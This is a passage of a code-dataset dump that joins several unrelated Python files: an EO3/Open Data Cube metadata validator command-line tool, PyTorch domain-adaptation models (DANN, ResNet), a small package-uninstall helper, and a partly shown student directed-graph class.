\")\n\n # The jsonschema error message for this (common error) is garbage. Make it clearer.\n measurements = doc.get(\"measurements\")\n if (measurements is not None) and not isinstance(measurements, Sequence):\n yield _error(\n \"measurements_list\",\n f\"Product measurements should be a list/sequence \"\n f\"(Found a {type(measurements).__name__!r}).\",\n )\n\n # There's no point checking further if the core doc structure is wrong.\n if has_doc_errors:\n return\n\n if not doc.get(\"license\", \"\").strip():\n yield _warning(\n \"no_license\",\n f\"Product {doc['name']!r} has no license field\",\n hint='Eg. \"CC-BY-4.0\" (SPDX format), \"various\" or \"proprietary\"',\n )\n\n # Check measurement name clashes etc.\n if measurements is None:\n # Products don't have to have measurements. (eg. provenance-only products)\n ...\n else:\n seen_names_and_aliases = collections.defaultdict(list)\n for measurement in measurements:\n measurement_name = measurement.get(\"name\")\n dtype = measurement.get(\"dtype\")\n nodata = measurement.get(\"nodata\")\n if not numpy_value_fits_dtype(nodata, dtype):\n yield _error(\n \"unsuitable_nodata\",\n f\"Measurement {measurement_name!r} nodata {nodata!r} does not fit a {dtype!r}\",\n )\n\n # Were any of the names seen in other measurements?\n these_names = measurement_name, *measurement.get(\"aliases\", ())\n for new_field_name in these_names:\n measurements_with_this_name = seen_names_and_aliases[new_field_name]\n if measurements_with_this_name:\n seen_in = \" and \".join(\n repr(s)\n for s in ([measurement_name] + measurements_with_this_name)\n )\n\n # If the same name is used by different measurements, its a hard error.\n yield _error(\n \"duplicate_measurement_name\",\n f\"Name {new_field_name!r} is used by multiple measurements\",\n hint=f\"It's duplicated in an alias. \"\n f\"Seen in measurement(s) {seen_in}\",\n )\n\n # Are any names duplicated within the one measurement? (not an error, but info)\n for duplicate_name in _find_duplicates(these_names):\n yield _info(\n \"duplicate_alias_name\",\n f\"Measurement {measurement_name!r} has a duplicate alias named {duplicate_name!r}\",\n )\n\n for field in these_names:\n seen_names_and_aliases[field].append(measurement_name)\n\n\ndef validate_metadata_type(doc: Dict) -> ValidationMessages:\n \"\"\"\n Check for common metadata-type mistakes\n \"\"\"\n\n # Validate it against ODC's schema (there will be refused by ODC otherwise)\n for error in serialise.METADATA_TYPE_SCHEMA.iter_errors(doc):\n displayable_path = \".\".join(map(str, error.absolute_path))\n context = f\"({displayable_path}) \" if displayable_path else \"\"\n yield _error(\"document_schema\", f\"{context}{error.message} \")\n\n\ndef _find_duplicates(values: Iterable[str]) -> Generator[str, None, None]:\n \"\"\"Return any duplicate values in the given sequence\n\n >>> list(_find_duplicates(('a', 'b', 'c')))\n []\n >>> list(_find_duplicates(('a', 'b', 'b')))\n ['b']\n >>> list(_find_duplicates(('a', 'b', 'b', 'a')))\n ['a', 'b']\n \"\"\"\n previous = None\n for v in sorted(values):\n if v == previous:\n yield v\n previous = v\n\n\ndef numpy_value_fits_dtype(value, dtype):\n \"\"\"\n Can the value be exactly represented by the given numpy dtype?\n\n >>> numpy_value_fits_dtype(3, 'uint8')\n True\n >>> numpy_value_fits_dtype(3, np.dtype('uint8'))\n True\n >>> numpy_value_fits_dtype(-3, 'uint8')\n False\n >>> numpy_value_fits_dtype(3.5, 'float32')\n True\n >>> numpy_value_fits_dtype(3.5, 'int16')\n False\n >>> numpy_value_fits_dtype(float('NaN'), 'float32')\n True\n >>> numpy_value_fits_dtype(float('NaN'), 'int32')\n False\n \"\"\"\n dtype = np.dtype(dtype)\n\n if value is None:\n value = 0\n\n if _is_nan(value):\n return np.issubdtype(dtype, np.floating)\n else:\n return np.all(np.array([value], dtype=dtype) == [value])\n\n\n@attr.s(auto_attribs=True)\nclass ExpectedMeasurement:\n name: str\n dtype: str\n nodata: int\n\n @classmethod\n def from_definition(cls, doc: Dict):\n return ExpectedMeasurement(doc[\"name\"], doc.get(\"dtype\"), doc.get(\"nodata\"))\n\n\n# Name of a field and its possible offsets in the document.\nFieldNameOffsetS = Tuple[str, Set[List[str]]]\n\n\ndef validate_paths(\n paths: List[str],\n thorough: bool = False,\n expect_extra_measurements: bool = False,\n product_definitions: Dict[str, Dict] = None,\n metadata_type_definitions: Dict[str, Dict] = None,\n) -> Generator[Tuple[str, List[ValidationMessage]], None, None]:\n \"\"\"Validate the list of paths. Product documents can be specified before their datasets.\"\"\"\n\n products = dict(product_definitions or {})\n metadata_types = dict(metadata_type_definitions or {})\n\n for url, doc, was_specified_by_user in read_paths(paths):\n messages = []\n kind = filename_doc_kind(url)\n if kind is None:\n kind = guess_kind_from_contents(doc)\n if kind and (kind in DOC_TYPE_SUFFIXES):\n # It looks like an ODC doc but doesn't have the standard suffix.\n messages.append(\n _warning(\n \"missing_suffix\",\n f\"Document looks like a {kind.name} but does not have \"\n f'filename extension \"{DOC_TYPE_SUFFIXES[kind]}{_readable_doc_extension(url)}\"',\n )\n )\n\n if kind == DocKind.product:\n messages.extend(validate_product(doc))\n if \"name\" in doc:\n products[doc[\"name\"]] = doc\n elif kind == DocKind.dataset:\n messages.extend(\n validate_eo3_doc(\n doc,\n url,\n products,\n metadata_types,\n thorough,\n expect_extra_measurements,\n )\n )\n elif kind == DocKind.metadata_type:\n messages.extend(validate_metadata_type(doc))\n if \"name\" in doc:\n metadata_types[doc[\"name\"]] = doc\n\n # Otherwise it's a file we don't support.\n # If the user gave us the path explicitly, it seems to be an error.\n # (if they didn't -- it was found via scanning directories -- we don't care.)\n elif was_specified_by_user:\n if kind is None:\n raise ValueError(f\"Unknown document type for {url}\")\n else:\n raise NotImplementedError(\n f\"Cannot currently validate {kind.name} files\"\n )\n else:\n # Not a doc type we recognise, and the user didn't specify it. Skip it.\n continue\n\n yield url, messages\n\n\ndef _get_field_offsets(metadata_type: Dict) -> Iterable[FieldNameOffsetS]:\n \"\"\"\n Yield all fields and their possible document-offsets that are expected for this metadata type.\n\n Eg, if the metadata type has a region_code field expected properties->region_code, this\n will yield ('region_code', {['properties', 'region_code']})\n\n (Properties can have multiple offsets, where ODC will choose the first non-null one, hence the\n return of multiple offsets for each field.)\n \"\"\"\n dataset_section = metadata_type[\"dataset\"]\n search_fields = dataset_section[\"search_fields\"]\n\n # The fixed fields of ODC. 'id', 'label', etc.\n for field in dataset_section:\n if field == \"search_fields\":\n continue\n\n offset = dataset_section[field]\n if offset is not None:\n yield field, [offset]\n\n # The configurable search fields.\n for field, spec in search_fields.items():\n offsets = []\n if \"offset\" in spec:\n offsets.append(spec[\"offset\"])\n offsets.extend(spec.get(\"min_offset\", []))\n offsets.extend(spec.get(\"max_offset\", []))\n\n yield field, offsets\n\n\ndef _readable_doc_extension(uri: str):\n \"\"\"\n >>> _readable_doc_extension('something.json.gz')\n '.json.gz'\n >>> _readable_doc_extension('something.yaml')\n '.yaml'\n >>> _readable_doc_extension('apple.odc-metadata.yaml.gz')\n '.yaml.gz'\n >>> _readable_doc_extension('products/tmad/tmad_product.yaml#part=1')\n '.yaml'\n >>> _readable_doc_extension('/tmp/human.06.tall.yml')\n '.yml'\n >>> # Not a doc, even though it's compressed.\n >>> _readable_doc_extension('db_dump.gz')\n >>> _readable_doc_extension('/tmp/nothing')\n \"\"\"\n path = urlparse(uri).path\n compression_formats = (\".gz\",)\n doc_formats = (\n \".yaml\",\n \".yml\",\n \".json\",\n )\n suffix = \"\".join(\n s.lower()\n for s in Path(path).suffixes\n if s.lower() in doc_formats + compression_formats\n )\n # If it's only compression, no doc format, it's not valid.\n if suffix in compression_formats:\n return None\n return suffix or None\n\n\ndef read_paths(\n input_paths: Iterable[str],\n) -> Generator[Tuple[str, Union[Dict, str], bool], None, None]:\n \"\"\"\n Read the given input paths, returning a URL, document, and whether\n it was explicitly given by the user.\n\n When a local directory is specified, inner readable docs are returned, but will\n be marked as not explicitly specified.\n \"\"\"\n for input_ in input_paths:\n for uri, was_specified in expand_paths_as_uris([input_]):\n try:\n for full_uri, doc in read_documents(uri, uri=True):\n yield full_uri, doc, was_specified\n except InvalidDocException as e:\n if was_specified:\n raise\n else:\n echo(e, err=True)\n\n\ndef expand_paths_as_uris(\n input_paths: Iterable[str],\n) -> Generator[Tuple[Path, bool], None, None]:\n \"\"\"\n For any paths that are directories, find inner documents that are known.\n\n Returns Tuples: path as a URL, and whether it was specified explicitly by user.\n \"\"\"\n for input_ in input_paths:\n if is_url(input_):\n yield input_, True\n else:\n path = Path(input_).resolve()\n if path.is_dir():\n for found_path in path.rglob(\"*\"):\n if _readable_doc_extension(found_path.as_uri()) is not None:\n yield found_path.as_uri(), False\n else:\n yield path.as_uri(), True\n\n\ndef validate_eo3_doc(\n doc: Dict,\n location: Union[str, Path],\n products: Dict[str, Dict],\n metadata_types: Dict[str, Dict],\n thorough: bool = False,\n expect_extra_measurements=False,\n) -> List[ValidationMessage]:\n messages = []\n\n # TODO: follow ODC's match rules?\n\n matched_product = None\n\n if products:\n matched_product, messages = _match_product(doc, products)\n else:\n messages.append(\n ValidationMessage(\n Level.error if thorough else Level.info,\n \"no_product\",\n \"No product provided: validating dataset information alone\",\n )\n )\n\n metadata_type = None\n if metadata_types and matched_product:\n metadata_type = matched_product[\"metadata_type\"]\n if metadata_type not in metadata_types:\n messages.append(\n ValidationMessage(\n Level.error if thorough else Level.info,\n \"no_metadata_type\",\n f\"Metadata type not provided {metadata_type}: not validating fields\",\n )\n )\n\n messages.extend(\n validate_dataset(\n doc,\n product_definition=matched_product,\n readable_location=location,\n thorough=thorough,\n metadata_type_definition=metadata_types.get(metadata_type),\n expect_extra_measurements=expect_extra_measurements,\n )\n )\n return messages\n\n\ndef _get_printable_differences(dict1: Dict, dict2: Dict):\n \"\"\"\n Get a series of lines to print that show the reason that dict1 is not a superset of dict2\n \"\"\"\n dict1 = dict(utils.flatten_dict(dict1))\n dict2 = dict(utils.flatten_dict(dict2))\n\n for path in dict2.keys():\n v1, v2 = dict1.get(path), dict2.get(path)\n if v1 != v2:\n yield f\"{path}: {v1!r} != {v2!r}\"\n\n\ndef _get_product_mismatch_reasons(dataset_doc: Dict, product_definition: Dict):\n \"\"\"\n Which fields don't match the given dataset doc to a product definition?\n\n Gives human-readable lines of text.\n \"\"\"\n yield from _get_printable_differences(dataset_doc, product_definition[\"metadata\"])\n\n\ndef _match_product(\n dataset_doc: Dict, product_definitions: Dict[str, Dict]\n) -> Tuple[Optional[Dict], List[ValidationMessage]]:\n \"\"\"Match the given dataset to a product definition\"\"\"\n\n product = None\n\n # EO3 datasets often put the product name directly inside.\n specified_product_name = get_path(dataset_doc, (\"product\", \"name\"), default=None)\n specified_product_name = specified_product_name or get_path(\n dataset_doc, (\"properties\", \"odc:product\"), default=None\n )\n\n if specified_product_name and (specified_product_name in product_definitions):\n product = product_definitions[specified_product_name]\n\n matching_products = {\n name: definition\n for name, definition in product_definitions.items()\n if changes.contains(dataset_doc, definition[\"metadata\"])\n }\n\n # We we have nothing, give up!\n if (not matching_products) and (not product):\n\n # Find the product that most closely matches it, to helpfully show the differences!\n closest_product_name = None\n closest_differences = None\n for name, definition in product_definitions.items():\n diffs = tuple(_get_product_mismatch_reasons(dataset_doc, definition))\n if (closest_differences is None) or len(diffs) < len(closest_differences):\n closest_product_name = name\n closest_differences = diffs\n\n difference_hint = _differences_as_hint(closest_differences)\n return None, [\n _error(\n \"unknown_product\",\n \"Dataset does not match the given products\",\n hint=f\"Closest match is {closest_product_name}, with differences:\"\n f\"\\n{difference_hint}\",\n )\n ]\n\n messages = []\n\n if specified_product_name not in matching_products:\n if product:\n difference_hint = _differences_as_hint(\n _get_product_mismatch_reasons(dataset_doc, product)\n )\n messages.append(\n _info(\n \"strange_product_claim\",\n f\"Dataset claims to be product {specified_product_name!r}, but doesn't match its fields\",\n hint=f\"{difference_hint}\",\n )\n )\n else:\n messages.append(\n _info(\n \"unknown_product_claim\",\n f\"Dataset claims to be product {specified_product_name!r}, but it wasn't supplied.\",\n )\n )\n\n if len(matching_products) > 1:\n matching_names = \", \".join(matching_products.keys())\n messages.append(\n _error(\n \"product_match_clash\",\n \"Multiple products match the given dataset\",\n hint=f\"Maybe you need more fields in the 'metadata' section?\\n\"\n f\"Claims to be a {specified_product_name!r}, and matches {matching_names!r}\"\n if specified_product_name\n else f\"Maybe you need more fields in the 'metadata' section?\\n\"\n f\"Matches {matching_names!r}\",\n )\n )\n # (We wont pick one from the bunch here. Maybe they already matched one above to use in continuing validation.)\n\n # Just like ODC, match rules will rule all. Even if their metadata has a \"product_name\" field.\n if len(matching_products) == 1:\n [product] = matching_products.values()\n\n return product, messages\n\n\ndef _differences_as_hint(product_diffs):\n return indent(\"\\n\".join(product_diffs), prefix=\"\\t\")\n\n\ndef _validate_stac_properties(dataset: DatasetDoc):\n for name, value in dataset.properties.items():\n if name not in dataset.properties.KNOWN_PROPERTIES:\n yield _warning(\"unknown_property\", f\"Unknown stac property {name!r}\")\n\n else:\n normaliser = dataset.properties.KNOWN_PROPERTIES.get(name)\n if normaliser and value is not None:\n try:\n normalised_value = normaliser(value)\n # A normaliser can return two values, the latter adding extra extracted fields.\n if isinstance(normalised_value, tuple):\n normalised_value = normalised_value[0]\n\n # It's okay for datetimes to be strings\n # .. since ODC's own loader does that.\n if isinstance(normalised_value, datetime) and isinstance(\n value, str\n ):\n value = ciso8601.parse_datetime(value)\n\n # Special case for dates, as \"no timezone\" and \"utc timezone\" are treated identical.\n if isinstance(value, datetime):\n value = default_utc(value)\n\n if not isinstance(value, type(normalised_value)):\n yield _warning(\n \"property_type\",\n f\"Value {value} expected to be \"\n f\"{type(normalised_value).__name__!r} (got {type(value).__name__!r})\",\n )\n elif normalised_value != value:\n if _is_nan(normalised_value) and _is_nan(value):\n # Both are NaNs, ignore.\n pass\n else:\n yield _warning(\n \"property_formatting\",\n f\"Property {value!r} expected to be {normalised_value!r}\",\n )\n except ValueError as e:\n yield _error(\"invalid_property\", f\"{name!r}: {e.args[0]}\")\n\n if \"odc:producer\" in dataset.properties:\n producer = dataset.properties[\"odc:producer\"]\n # We use domain name to avoid arguing about naming conventions ('ga' vs 'geoscience-australia' vs ...)\n if \".\" not in producer:\n yield _warning(\n \"producer_domain\",\n \"Property 'odc:producer' should be the organisation's domain name. Eg. 'ga.gov.au'\",\n )\n\n # This field is a little odd, but is expected by the current version of ODC.\n # (from discussion with Kirill)\n if not dataset.properties.get(\"odc:file_format\"):\n yield _warning(\n \"global_file_format\",\n \"Property 'odc:file_format' is empty\",\n hint=\"Usually 'GeoTIFF'\",\n )\n\n\ndef _is_nan(v):\n # Due to JSON serialisation, nan can also be represented as a string 'NaN'\n if isinstance(v, str):\n return v == \"NaN\"\n return isinstance(v, float) and math.isnan(v)\n\n\ndef _validate_geo(dataset: DatasetDoc, expect_geometry: bool = True):\n has_some_geo = _has_some_geo(dataset)\n if not has_some_geo and expect_geometry:\n yield _info(\"non_geo\", \"No geo information in dataset\")\n return\n\n if dataset.geometry is None:\n if expect_geometry:\n yield _info(\"incomplete_geo\", \"Dataset has some geo fields but no geometry\")\n elif not dataset.geometry.is_valid:\n yield _error(\n \"invalid_geometry\",\n f\"Geometry is not a valid shape: {explain_validity(dataset.geometry)!r}\",\n )\n\n # TODO: maybe we'll allow no grids: backwards compat with old metadata.\n if not dataset.grids:\n yield _error(\"incomplete_grids\", \"Dataset has some geo fields but no grids\")\n\n if not dataset.crs:\n yield _error(\"incomplete_crs\", \"Dataset has some geo fields but no crs\")\n else:\n # We only officially support epsg code (recommended) or wkt.\n if dataset.crs.lower().startswith(\"epsg:\"):\n try:\n CRS.from_string(dataset.crs)\n except CRSError as e:\n yield _error(\"invalid_crs_epsg\", e.args[0])\n\n if dataset.crs.lower() != dataset.crs:\n yield _warning(\"mixed_crs_case\", \"Recommend lowercase 'epsg:' prefix\")\n else:\n wkt_crs = None\n try:\n wkt_crs = CRS.from_wkt(dataset.crs)\n except CRSError as e:\n yield _error(\n \"invalid_crs\",\n f\"Expect either an epsg code or a WKT string: {e.args[0]}\",\n )\n\n if wkt_crs and wkt_crs.is_epsg_code:\n yield _warning(\n \"non_epsg\",\n f\"Prefer an EPSG code to a WKT when possible. (Can change CRS to 'epsg:{wkt_crs.to_epsg()}')\",\n )\n\n\ndef _has_some_geo(dataset):\n return dataset.geometry is not None or dataset.grids or dataset.crs\n\n\ndef display_result_console(\n url: str, is_valid: bool, messages: List[ValidationMessage], quiet=False\n):\n \"\"\"\n Print validation messages to the Console (using colour if available).\n \"\"\"\n # Otherwise console output, with color if possible.\n if messages or not quiet:\n echo(f\"{bool_style(is_valid)} {url}\")\n\n for message in messages:\n hint = \"\"\n if message.hint:\n # Indent the hint if it's multi-line.\n if \"\\n\" in message.hint:\n hint = \"\\t\\tHint:\\n\"\n hint += indent(message.hint, \"\\t\\t\" + (\" \" * 5))\n else:\n hint = f\"\\t\\t(Hint: {message.hint})\"\n s = {\n Level.info: dict(),\n Level.warning: dict(fg=\"yellow\"),\n Level.error: dict(fg=\"red\"),\n }\n displayable_code = style(f\"{message.code}\", **s[message.level], bold=True)\n echo(f\"\\t{message.level.name[0].upper()} {displayable_code} {message.reason}\")\n if hint:\n echo(hint)\n\n\ndef display_result_github(url: str, is_valid: bool, messages: List[ValidationMessage]):\n \"\"\"\n Print validation messages using Github Action's command language for warnings/errors.\n \"\"\"\n echo(f\"{bool_style(is_valid)} {url}\")\n for message in messages:\n hint = \"\"\n if message.hint:\n # Indent the hint if it's multi-line.\n if \"\\n\" in message.hint:\n hint = \"\\n\\nHint:\\n\"\n hint += indent(message.hint, (\" \" * 5))\n else:\n hint = f\"\\n\\n(Hint: {message.hint})\"\n\n if message.level == Level.error:\n code = \"::error\"\n else:\n code = \"::warning\"\n\n text = f\"{message.reason}{hint}\"\n\n # URL-Encode any newlines\n text = text.replace(\"\\n\", \"%0A\")\n # TODO: Get the real line numbers?\n echo(f\"{code} file={url},line=1::{text}\")\n\n\n_OUTPUT_WRITERS = dict(\n plain=display_result_console,\n quiet=partial(display_result_console, quiet=True),\n github=display_result_github,\n)\n\n\n@click.command(\n help=__doc__\n + \"\"\"\nPaths can be products, dataset documents, or directories to scan (for files matching\nnames '*.odc-metadata.yaml' etc), either local or URLs.\n\nDatasets are validated against matching products that have been scanned already, so specify\nproducts first, and datasets later, to ensure they can be matched.\n\"\"\"\n)\n@click.version_option()\n@click.argument(\"paths\", nargs=-1)\n@click.option(\n \"--warnings-as-errors\",\n \"-W\",\n \"strict_warnings\",\n is_flag=True,\n help=\"Fail if any warnings are produced\",\n)\n@click.option(\n \"-f\",\n \"--output-format\",\n help=\"Output format\",\n type=click.Choice(list(_OUTPUT_WRITERS)),\n # Are we in Github Actions?\n # Send any warnings/errors in its custom format\n default=\"github\" if \"GITHUB_ACTIONS\" in os.environ else \"plain\",\n show_default=True,\n)\n@click.option(\n \"--thorough\",\n is_flag=True,\n help=\"Attempt to read the data/measurements, and check their properties match\",\n)\n@click.option(\n \"--expect-extra-measurements/--warn-extra-measurements\",\n is_flag=True,\n default=False,\n help=\"Allow some dataset measurements to be missing from the product definition. \"\n \"This is (deliberately) allowed by ODC, but often a mistake. This flag disables the warning.\",\n)\n@click.option(\n \"--explorer-url\",\n \"explorer_url\",\n help=\"Use product definitions from the given Explorer URL to validate datasets. \"\n 'Eg: \"https://explorer.dea.ga.gov.au/\"',\n)\n@click.option(\n \"--odc\",\n \"use_datacube\",\n is_flag=True,\n help=\"Use product definitions from datacube to validate datasets\",\n)\n@click.option(\n \"-q\",\n \"--quiet\",\n is_flag=True,\n default=False,\n help=\"Only print problems, one per line\",\n)\ndef run(\n paths: List[str],\n strict_warnings,\n quiet,\n thorough: bool,\n expect_extra_measurements: bool,\n explorer_url: str,\n use_datacube: bool,\n output_format: str,\n):\n validation_counts: Counter[Level] = collections.Counter()\n invalid_paths = 0\n current_location = Path(\".\").resolve().as_uri() + \"/\"\n\n product_definitions = _load_remote_product_definitions(use_datacube, explorer_url)\n\n if output_format == \"plain\" and quiet:\n output_format = \"quiet\"\n write_file_report = _OUTPUT_WRITERS[output_format]\n\n for url, messages in validate_paths(\n paths,\n thorough=thorough,\n expect_extra_measurements=expect_extra_measurements,\n product_definitions=product_definitions,\n ):\n if url.startswith(current_location):\n url = url[len(current_location) :]\n\n levels = collections.Counter(m.level for m in messages)\n is_invalid = levels[Level.error] > 0\n if strict_warnings:\n is_invalid |= levels[Level.warning] > 0\n\n if quiet:\n # Errors/Warnings only. Remove info-level.\n messages = [m for m in messages if m.level != Level.info]\n\n if is_invalid:\n invalid_paths += 1\n\n for message in messages:\n validation_counts[message.level] += 1\n\n write_file_report(\n url=url,\n is_valid=not is_invalid,\n messages=messages,\n )\n\n # Print a summary on stderr for humans.\n if not quiet:\n result = (\n style(\"failure\", fg=\"red\", bold=True)\n if invalid_paths > 0\n else style(\"valid\", fg=\"green\", bold=True)\n )\n secho(f\"\\n{result}: \", nl=False, err=True)\n if validation_counts:\n echo(\n \", \".join(\n f\"{v} {k.name}{'s' if v > 1 else ''}\"\n for k, v in validation_counts.items()\n ),\n err=True,\n )\n else:\n secho(f\"{len(paths)} paths\", err=True)\n\n sys.exit(invalid_paths)\n\n\ndef _load_remote_product_definitions(\n from_datacube: bool = False,\n from_explorer_url: Optional[str] = None,\n) -> Dict[str, Dict]:\n\n product_definitions = {}\n # Load any remote products that were asked for.\n if from_explorer_url:\n for definition in _load_explorer_product_definitions(from_explorer_url):\n product_definitions[definition[\"name\"]] = definition\n secho(f\"{len(product_definitions)} Explorer products\", err=True)\n\n if from_datacube:\n # The normal datacube environment variables can be used to choose alternative configs.\n with Datacube(app=\"eo3-validate\") as dc:\n for product in dc.index.products.get_all():\n product_definitions[product.name] = product.definition\n\n secho(f\"{len(product_definitions)} ODC products\", err=True)\n return product_definitions\n\n\ndef _load_doc(url):\n return list(load_documents(url))\n\n\ndef _load_explorer_product_definitions(\n explorer_url: str,\n workers: int = 6,\n) -> Generator[Dict, None, None]:\n \"\"\"\n Read all product yamls from the given Explorer instance,\n\n eg: https://explorer.dea.ga.gov.au/products/ls5_fc_albers.odc-product.yaml\n \"\"\"\n product_urls = [\n urljoin(explorer_url, f\"/products/{name.strip()}.odc-product.yaml\")\n for name in urlopen(urljoin(explorer_url, \"products.txt\")) # nosec\n .read()\n .decode(\"utf-8\")\n .split(\"\\n\")\n ]\n count = 0\n with multiprocessing.Pool(workers) as pool:\n for product_definitions in pool.imap_unordered(_load_doc, product_urls):\n count += 1\n echo(f\"\\r{count} Explorer products\", nl=False)\n yield from product_definitions\n pool.close()\n pool.join()\n echo()\n","sub_path":"eodatasets3/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":43646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"571128652","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Function, Variable\nfrom functions import ReverseLayerF\nimport torchvision.models as models\nclass AlexNet(nn.Module):\n def __init__(self):\n super(AlexNet, self).__init__()\n self.features = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=11, stride=4, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(64, 192, kernel_size=5, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(192, 384, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(256, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n )\n self.classifier = nn.Sequential(\n nn.Dropout(),\n nn.Linear(256 * 6 * 6, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(inplace=True),\n # nn.Linear(4096, num_classes),\n )\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), 256 * 6 * 6)\n x = self.classifier(x)\n return x\n\nalexnet = models.alexnet(pretrained=True)\n\nclass DANN(nn.Module):\n def __init__(self):\n super(DANN, self).__init__()\n self.feature = AlexNet().features\n\n self.class_classifier = nn.Sequential()\n self.class_classifier.add_module('c_fc0', nn.Linear(256 * 6 * 6, 4096))\n self.class_classifier.add_module('c_drop1', nn.Dropout2d())\n self.class_classifier.add_module('c_relu1', nn.ReLU(True))\n self.class_classifier.add_module('c_fc1', nn.Linear(4096, 65))\n\n self.domain_classifier = nn.Sequential()\n self.domain_classifier.add_module('c_fc0', nn.Linear(256 * 6 * 6, 4096))\n self.domain_classifier.add_module('d_relu1', nn.ReLU(True))\n self.domain_classifier.add_module('d_fc2', nn.Linear(4096, 2))\n \n def forward(self, input_data, alpha):\n feature = self.feature(input_data)\n print(feature.size())\n feature = feature.view(-1, 256*6*6)\n reverse_feature = ReverseLayerF.apply(feature, alpha)\n class_output = self.class_classifier(feature)\n domain_output = self.domain_classifier(reverse_feature)\n\n return class_output, domain_output\n\nclass ResNet(nn.Module):\n def __init__(self):\n super(ResNet, self).__init__()\n resnet50 = models.resnet50(pretrained=True)\n self.resnet50_features = nn.Sequential(*list(resnet50.children())[:-1])\n self.class_classifier = nn.Sequential()\n self.class_classifier.add_module('c_fc0', nn.Linear(2048, 11))\n\n\n self.domain_classifier = nn.Sequential()\n self.domain_classifier.add_module('d_fc0', nn.Linear(2048, 2))\n\n def forward(self, input_data, alpha):\n feature = self.resnet50_features(input_data)\n feature = feature.view(-1, 2048)\n reverse_feature = ReverseLayerF.apply(feature, alpha)\n class_output = self.class_classifier(feature)\n domain_output = self.domain_classifier(reverse_feature)\n\n return class_output, domain_output","sub_path":"Dark Images/DANN/Models.py","file_name":"Models.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"496264114","text":"\"\"\"\nUninstalls a package and returns a dictionary containing which packages\nwere uninstalled successfully or unsuccessfully.\n\"\"\"\n\nimport packaging.install\n\n\ndef uninstall(package_list):\n result = {'uninstalled': [], 'failed': []}\n\n for package in package_list:\n if packaging.install.remove(package):\n result['uninstalled'].append(package)\n else:\n result['failed'].append(package)\n\n return result\n","sub_path":"pip2/commands/uninstall.py","file_name":"uninstall.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"327814309","text":"# Course: CS261 - Data Structures\n# Author:\n# Assignment:\n# Description:\n\nimport heapq\n\nclass DirectedGraph:\n \"\"\"\n Class to implement directed weighted graph\n - duplicate edges not allowed\n - loops not allowed\n - only positive edge weights\n - vertex names are integers\n \"\"\"\n\n def __init__(self, start_edges=None):\n \"\"\"\n Store graph info as adjacency matrix\n DO NOT CHANGE THIS METHOD IN ANY WAY\n \"\"\"\n self.v_count = 0\n self.adj_matrix = []\n\n # populate graph with initial vertices and edges (if provided)\n # before using, implement add_vertex() and add_edge() methods\n if start_edges is not None:\n v_count = 0\n for u, v, _ in start_edges:\n v_count = max(v_count, u, v)\n for _ in range(v_count + 1):\n self.add_vertex()\n for u, v, weight in start_edges:\n self.add_edge(u, v, weight)\n\n def __str__(self):\n \"\"\"\n Return content of the graph in human-readable form\n DO NOT CHANGE THIS METHOD IN ANY WAY\n \"\"\"\n if self.v_count == 0:\n return 'EMPTY GRAPH\\n'\n out = ' |'\n out += ' '.join(['{:2}'.format(i) for i in range(self.v_count)]) + '\\n'\n out += '-' * (self.v_count * 3 + 3) + '\\n'\n for i in range(self.v_count):\n row = self.adj_matrix[i]\n out += '{:2} |'.format(i)\n out += ' '.join(['{:2}'.format(w) for w in row]) + '\\n'\n out = f\"GRAPH ({self.v_count} vertices):\\n{out}\"\n return out\n\n # ------------------------------------------------------------------ #\n\n def add_vertex(self) -> int:\n \"\"\"\n This method adds a new vertex to the graph.\n \"\"\"\n self.v_count += 1\n self.adj_matrix = [[0 for x in range(self.v_count)]for y in range(self.v_count)]\n return self.v_count\n\n def add_edge(self, src: int, dst: int, weight=1) -> None:\n \"\"\"\n This method adds a new edge to the graph.\n \"\"\"\n if src > self.v_count-1 or dst > self.v_count-1:\n return\n if self.adj_matrix[src] and self.adj_matrix[dst] and weight > 0 and src != dst:\n self.adj_matrix[src][dst] = weight\n\n def remove_edge(self, src: int, dst: int) -> None:\n \"\"\"\n This method removes an edge between two vertices\n \"\"\"\n if src < 0 or dst < 0:\n return\n if src > self.v_count - 1 or dst > self.v_count - 1:\n return\n if self.adj_matrix[src] and self.adj_matrix[src][dst] > 0:\n self.adj_matrix[src][dst] = 0\n\n def get_vertices(self) -> []:\n \"\"\"\n This method returns a list of vertices of the graph\n \"\"\"\n verts =[]\n\n for i in range(self.v_count):\n verts.append(i)\n return verts\n\n def get_edges(self) -> []:\n \"\"\"\n This method returns a list of edges in the graph\n \"\"\"\n eds = []\n for x in range(self.v_count):\n for y in range(self.v_count):\n if self.adj_matrix[x][y] > 0:\n eds.append((x, y, self.adj_matrix[x][y]))\n return eds\n\n def is_valid_path(self, path: []) -> bool:\n \"\"\"\n TODO: Write this implementation\n \"\"\"\n eds = []\n k = 0\n for x in range(self.v_count):\n for y in range(self.v_count):\n if self.adj_matrix[x][y] > 0:\n eds.append((x, y))\n\n while k+1 < len(path):\n if (path[k], path[k+1]) in eds:\n k += 1\n else:\n return False\n return True\n\n def dfs(self, v_start, v_end=None, visited=None) -> []:\n \"\"\"\n Return list of vertices visited during DFS search\n Vertices are picked in ascending order\n \"\"\"\n if v_end is not None:\n if not self.adj_matrix[v_start][v_end]:\n v_end = None\n\n if visited is None:\n visited = []\n\n if v_start < 0 or v_start > self.v_count -1:\n return visited\n visited.append(v_start)\n\n adj = self.adj_matrix[v_start]\n for x in range(self.v_count):\n if adj[x] > 0 and x not in visited and v_end not in visited:\n self.dfs(x, v_end, visited)\n return visited\n\n def bfs(self, v_start, v_end=None) -> []:\n \"\"\"\n Return list of vertices visited during BFS 